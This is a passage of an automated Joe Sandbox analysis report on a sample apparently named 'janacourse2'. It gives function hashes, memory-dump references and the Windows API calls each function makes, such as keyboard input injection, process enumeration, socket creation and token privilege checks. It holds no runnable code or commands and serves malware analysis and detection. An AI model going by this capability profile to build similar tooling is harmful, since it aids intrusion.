• Opcode ID: e4b60104176066c26057cf10b003671ec878a27f5cc1cbb3b3b094740eeef992
• Instruction ID: b47de7f2640ecf556915c4286de35b4b32e01d8b074a56444c4a23162046184d
• Opcode Fuzzy Hash: e4b60104176066c26057cf10b003671ec878a27f5cc1cbb3b3b094740eeef992
• Instruction Fuzzy Hash: 5BA158756043019FC710EF29C985A6ABBE9FF88314F088859F98A9B365DB34ED01DF91
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0104FC08,?), ref: 010105F0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0104FC08,?), ref: 01010608
• CLSIDFromProgID.OLE32(?,?,00000000,0104CC40,000000FF,?,00000000,00000800,00000000,?,0104FC08,?), ref: 0101062D
• _memcmp.LIBVCRUNTIME ref: 0101064E
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: 404cb9727df11c51cc5517377b937e0fc950f27101988bae1502235ba024887d
• Instruction ID: 56a93c2dce3a0e14600b1b415ef2fdaf2ab70371bc0f78b73757f652c5732d46
• Opcode Fuzzy Hash: 404cb9727df11c51cc5517377b937e0fc950f27101988bae1502235ba024887d
• Instruction Fuzzy Hash: BA816B71A00109EFCB04CF98C984EEEB7B9FF89315F204598F546AB254DB75AE46CB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: ae98dca3075db20f7c4b732631731ed6f27e71f82e66c1d63151498975e4c8f7
• Instruction ID: 99ab527f01a214c5d07289e7ffff556c3aa8b94778f5ee37a2ebd17685d043f6
                                                                                                            • Opcode Fuzzy Hash: ae98dca3075db20f7c4b732631731ed6f27e71f82e66c1d63151498975e4c8f7
                                                                                                            • Instruction Fuzzy Hash: 55412E3190010CEBDB25EBBD9C45BBE3AA5FF82370F184226FA19D72B1E67848417671
                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32(0118EAB0,?), ref: 010462E2
                                                                                                            • ScreenToClient.USER32(?,?), ref: 01046315
                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 01046382
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3880355969-0
                                                                                                            • Opcode ID: c20b94b6614d0da832ba0c83e8e90cbf9d66211990ffda35cf788354e1c388c7
                                                                                                            • Instruction ID: 79285265417ea4916b45cbdace78ed3153d592bce836a5c825349521d59118b4
                                                                                                            • Opcode Fuzzy Hash: c20b94b6614d0da832ba0c83e8e90cbf9d66211990ffda35cf788354e1c388c7
                                                                                                            • Instruction Fuzzy Hash: C3516CB4A00249AFDF21CF58D9C09AE7BF5FF46321F1081A9F8A497291E732E941CB50
                                                                                                            APIs
                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 01031AFD
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031B0B
                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01031B8A
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031B94
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$socket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1881357543-0
                                                                                                            • Opcode ID: 3057b747991c559f7e92ef982296823cd0dad03e82254b7de8495265eca71bbc
                                                                                                            • Instruction ID: 150e860d5e72b01577d05994718fd33d395a1b71a1b93c2a08d58427169ce829
                                                                                                            • Opcode Fuzzy Hash: 3057b747991c559f7e92ef982296823cd0dad03e82254b7de8495265eca71bbc
                                                                                                            • Instruction Fuzzy Hash: B141B574600200AFE724EF24C986F6A77E5AB88718F54848CF6569F3C2D776DD428B90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d93ad44a00cf5539fd30b2c3f9cfd030b211995acee0815873480672aa63fb45
                                                                                                            • Instruction ID: 7364e56d005ffaf384055906ff64f347bdaeb8e2101a459b7825833e21f6520e
                                                                                                            • Opcode Fuzzy Hash: d93ad44a00cf5539fd30b2c3f9cfd030b211995acee0815873480672aa63fb45
                                                                                                            • Instruction Fuzzy Hash: 80410872A00344AFD724DF79CC41B6BBBA9EF84720F10466EF541DB2D1D775A9019790
                                                                                                            APIs
                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 01025783
                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 010257A9
                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 010257CE
                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 010257FA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3321077145-0
                                                                                                            • Opcode ID: b2c2fe7d306032fbbacdbe490bcf3fcd43035e25270ebb8f84b8e529418cd1ec
                                                                                                            • Instruction ID: 9388bbfd40493786cf662a955bffa6ce2745bf589e8e4cc557b9087d86a1b93b
                                                                                                            • Opcode Fuzzy Hash: b2c2fe7d306032fbbacdbe490bcf3fcd43035e25270ebb8f84b8e529418cd1ec
                                                                                                            • Instruction Fuzzy Hash: 8A412E39600610DFCB21EF15C945A9EBBE1AF89310B18C488E84A6B366CB79FD01DF91
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00FD6D71,00000000,00000000,00FD82D9,?,00FD82D9,?,00000001,00FD6D71,8BE85006,00000001,00FD82D9,00FD82D9), ref: 00FED910
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FED999
                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00FED9AB
                                                                                                            • __freea.LIBCMT ref: 00FED9B4
                                                                                                              • Part of subcall function 00FE3820: RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                            • String ID:
                                                                                                            • API String ID: 2652629310-0
                                                                                                            • Opcode ID: 94a991a642e6b2a7ec06daf26045c92a129bdf94cddb13c5340356f2284f0cec
                                                                                                            • Instruction ID: 5a49a558e5e386194533a3d4bee53ca792c7ae9909a4cd243a28b9fbb5aa74e6
                                                                                                            • Opcode Fuzzy Hash: 94a991a642e6b2a7ec06daf26045c92a129bdf94cddb13c5340356f2284f0cec
                                                                                                            • Instruction Fuzzy Hash: 8631E172A0124AABDF24DF66DC85EAE7BA5EF41320F050169FC04D7251EB39DD50EBA0
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0101AAAC
                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0101AAC8
                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0101AB36
                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0101AB88
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 432972143-0
                                                                                                            • Opcode ID: 9a8f4b4976fe5ca8ede02cf6095f2f095b7cd8c89de47958ad8f4e176aa0a642
                                                                                                            • Instruction ID: 82438d705b732f435273dc3054cb474003931344b6ca6c1555761d189d8c25cc
                                                                                                            • Opcode Fuzzy Hash: 9a8f4b4976fe5ca8ede02cf6095f2f095b7cd8c89de47958ad8f4e176aa0a642
                                                                                                            • Instruction Fuzzy Hash: 2E310470B422C8EEFF318A688884BFA7BE6BB44310F04465AE1C1531DAD37D85818761
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 01045352
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01045375
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01045382
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010453A8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3340791633-0
                                                                                                            • Opcode ID: b62bbd4c9339bcee74e31be0631084274277284ad173aa5ac2b4492d56eec3e6
                                                                                                            • Instruction ID: eb94f9d90c45010c303c50ba52f27824ef2cc4015f6907e0ef1d25c05e9278b1
                                                                                                            • Opcode Fuzzy Hash: b62bbd4c9339bcee74e31be0631084274277284ad173aa5ac2b4492d56eec3e6
                                                                                                            • Instruction Fuzzy Hash: FA31C2B4A55208FFFB749E18CCC5BE83BE5AB05352F48C1A1FAD0961D1C7B5A980DB42
                                                                                                            APIs
                                                                                                            • ClientToScreen.USER32(?,?), ref: 0104769A
                                                                                                            • GetWindowRect.USER32(?,?), ref: 01047710
                                                                                                            • PtInRect.USER32(?,?,01048B89), ref: 01047720
                                                                                                            • MessageBeep.USER32(00000000), ref: 0104778C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1352109105-0
                                                                                                            • Opcode ID: 7cb9f41c74c48703214f24d77f69ddef017c759e480b77b2aa8737a93e4ad935
                                                                                                            • Instruction ID: fcb2ec6af474d8d1b0997b629d7b686f83147506a2630ba21a1bacf3804dc641
                                                                                                            • Opcode Fuzzy Hash: 7cb9f41c74c48703214f24d77f69ddef017c759e480b77b2aa8737a93e4ad935
                                                                                                            • Instruction Fuzzy Hash: 3041BCB8601215EFDB22CF58C5C4EAC7BF5BF48310F4540B8E9D49B255C336A942CB90
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32 ref: 010416EB
                                                                                                              • Part of subcall function 01013A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01013A57
                                                                                                              • Part of subcall function 01013A3D: GetCurrentThreadId.KERNEL32 ref: 01013A5E
                                                                                                              • Part of subcall function 01013A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010125B3), ref: 01013A65
                                                                                                            • GetCaretPos.USER32(?), ref: 010416FF
                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 0104174C
                                                                                                            • GetForegroundWindow.USER32 ref: 01041752
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2759813231-0
                                                                                                            • Opcode ID: 2037f74f3ad0f27b10ad1be95344ceb2ec61ed357ec6709c98d60c0a70662d5f
                                                                                                            • Instruction ID: 5606cfb086b00b146c7f6ed94655590b738e139d319286c86506e7e9c0568937
                                                                                                            • Opcode Fuzzy Hash: 2037f74f3ad0f27b10ad1be95344ceb2ec61ed357ec6709c98d60c0a70662d5f
                                                                                                            • Instruction Fuzzy Hash: CD313EB5D00249AFD700EFAAC9C18EEBBF9FF48204B5480AAE455E7201D7359E45CFA0
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0101D501
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0101D50F
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0101D52F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0101D5DC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 420147892-0
                                                                                                            • Opcode ID: 1a35eba3f589b5150bb042377674733b62abedd704515487e028b27a224da148
                                                                                                            • Instruction ID: 89fecb4b90579034d8db62ae748eb383cd3a83790058b4d3d1ea56d69c560e90
                                                                                                            • Opcode Fuzzy Hash: 1a35eba3f589b5150bb042377674733b62abedd704515487e028b27a224da148
                                                                                                            • Instruction Fuzzy Hash: 8B31BF711083009FD311EF94CC85AAFBBF8EF99354F14092DF6C1821A1EB799A48DB92
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            • GetCursorPos.USER32(?), ref: 01049001
                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,01007711,?,?,?,?,?), ref: 01049016
                                                                                                            • GetCursorPos.USER32(?), ref: 0104905E
                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,01007711,?,?,?), ref: 01049094
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2864067406-0
                                                                                                            • Opcode ID: c0f1b46333ed426166830e1ca267e56dead5539b695b8f7461735db36284f235
                                                                                                            • Instruction ID: adaf7265b764cb6a8008fd9fddd03fb1add30408b0d6ec8a3ed4912f96f0528c
                                                                                                            • Opcode Fuzzy Hash: c0f1b46333ed426166830e1ca267e56dead5539b695b8f7461735db36284f235
                                                                                                            • Instruction Fuzzy Hash: 04219C75601018AFEB25DF98C889EEF3BB9EF89350F0040B9FA8547251C7369990DB60
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNEL32(?,0104CB68), ref: 0101D2FB
                                                                                                            • GetLastError.KERNEL32 ref: 0101D30A
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0101D319
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0104CB68), ref: 0101D376
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 2267087916-0
                                                                                                            • Opcode ID: 957467fca28ded74a9180eee71b82353d7e2ffb8fb0c29123e37560ce07ec9fa
                                                                                                            • Instruction ID: b93667d6e3b2e1bd46ebc088e74a48e2f9ed4c8bafa1f0fc8c31d34f093bbfbb
                                                                                                            • Opcode Fuzzy Hash: 957467fca28ded74a9180eee71b82353d7e2ffb8fb0c29123e37560ce07ec9fa
                                                                                                            • Instruction Fuzzy Hash: 5321E2745093019F9310DF69CA848AE7BE8EF46328F108A5DF4D9C72A5DB39D906CF92
                                                                                                            APIs
                                                                                                              • Part of subcall function 01011014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0101102A
                                                                                                              • Part of subcall function 01011014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01011036
                                                                                                              • Part of subcall function 01011014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011045
                                                                                                              • Part of subcall function 01011014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0101104C
                                                                                                              • Part of subcall function 01011014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011062
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010115BE
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 010115E1
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01011617
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0101161E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                            • String ID:
